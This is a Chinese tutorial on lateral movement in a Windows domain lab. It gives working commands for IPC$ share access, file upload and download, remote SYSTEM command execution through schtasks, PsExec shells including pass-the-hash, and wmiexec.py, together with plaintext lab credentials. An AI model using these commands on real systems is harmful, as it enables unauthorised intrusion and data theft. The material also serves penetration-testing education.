溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何使用內網中橫向移動的命令行工具

發(fā)布時間:2021-10-15 09:21:45 來源:億速云 閱讀:171 作者:iii 欄目:編程語言

這篇文章主要講解了“如何使用內網中橫向移動的命令行工具”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“如何使用內網中橫向移動的命令行工具”吧!

目標機器: 192.168.101.157

一、IPC$連接

IPC$(Internet Process Connection) 是共享 " 命名管道 " 的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道并以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。

調出命令行窗口,可以先執(zhí)行net use查看已建立的連接

如何使用內網中橫向移動的命令行工具

執(zhí)行以下命令與目標建立ipc$連接

net use \\192.168.101.157(目標ip) /u:god(域名)\Administrator(用戶名) hongrisec@2020(密碼)

如何使用內網中橫向移動的命令行工具執(zhí)行成功會返回命令成功完成

之后可以使用dir命令列出目標文件夾文件,如執(zhí)行以下命令列出c盤下文件夾

dir \\192.168.101.157\c$

如何使用內網中橫向移動的命令行工具

列出c盤下phpStudy目錄的文件

dir \\192.168.101.157\c$\phpStudy

如何使用內網中橫向移動的命令行工具

如果想下載文件則執(zhí)行以下命令,將phpshao.dll文件下載存放至temp文件夾處

copy \\192.168.101.157\c$\phpStudy\phpshao.dll C:\Windows\temp

如何使用內網中橫向移動的命令行工具

如何使用內網中橫向移動的命令行工具

同理,如果想要上傳文件的話則執(zhí)行

copy F:\test.txt \\192.168.101.157\c$

如何使用內網中橫向移動的命令行工具

可以看到已經將文件傳輸上去了

也可以通過計劃任務執(zhí)行系統(tǒng)命令,首先執(zhí)行下面命令創(chuàng)建一個名為test2的計劃任務

schtasks /create /s 192.168.101.157 /tn test2 /sc minute /mo 1 /tr "C:\Windows\System32\cmd.exe /c 'whoami > C:\Windows\temp\test2.txt'" /ru system /f /u god\Administrator /p hongrisec@2020

如何使用內網中橫向移動的命令行工具

之后執(zhí)行以下命令,立即執(zhí)行計劃任務

schtasks /run /s 192.168.101.157 /i /tn test2 /u god\Administrator /p hongrisec@2020

如何使用內網中橫向移動的命令行工具

執(zhí)行成功之后使用type命令查看執(zhí)行內容的回顯

type \\192.168.101.157\c$\Windows\temp\test2.txt

如何使用內網中橫向移動的命令行工具

二、psexec

也可以通過psexec去連接目標,不過動靜有點大,會在目標機器上起一個服務,產生大量日志

可以在這里下載

如何使用內網中橫向移動的命令行工具

執(zhí)行以下命令獲取一個交互式的shell,如果無法建立連接,嘗試使用管理員身份執(zhí)行

PsExec64.exe -accepteula \\192.168.101.157(目標IP) -u god(域)\Administrator(用戶名) -p hongrisec@2020(密碼) -s cmd.exe

如何使用內網中橫向移動的命令行工具也可以執(zhí)行以下命令,使用hash進行連接

psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 god/Administrator@192.168.1.1 "whoami"

當然msf里面也有模塊可以通過psexec與目標連接

exploit/windows/smb/psexec

三、wmiexec.py連接

可以在這里下載工具包

直接執(zhí)行以下命令就可以建立連接了

python wmiexec.py god(域)/administrator(用戶名):hongrisec@2020(密碼)@192.168.101.157(目標IP)

如何使用內網中橫向移動的命令行工具

也可以使用hash去連接目標,稍微變一下就可以了

感謝各位的閱讀,以上就是“如何使用內網中橫向移動的命令行工具”的內容了,經過本文的學習后,相信大家對如何使用內網中橫向移動的命令行工具這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關知識點的文章,歡迎關注!

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI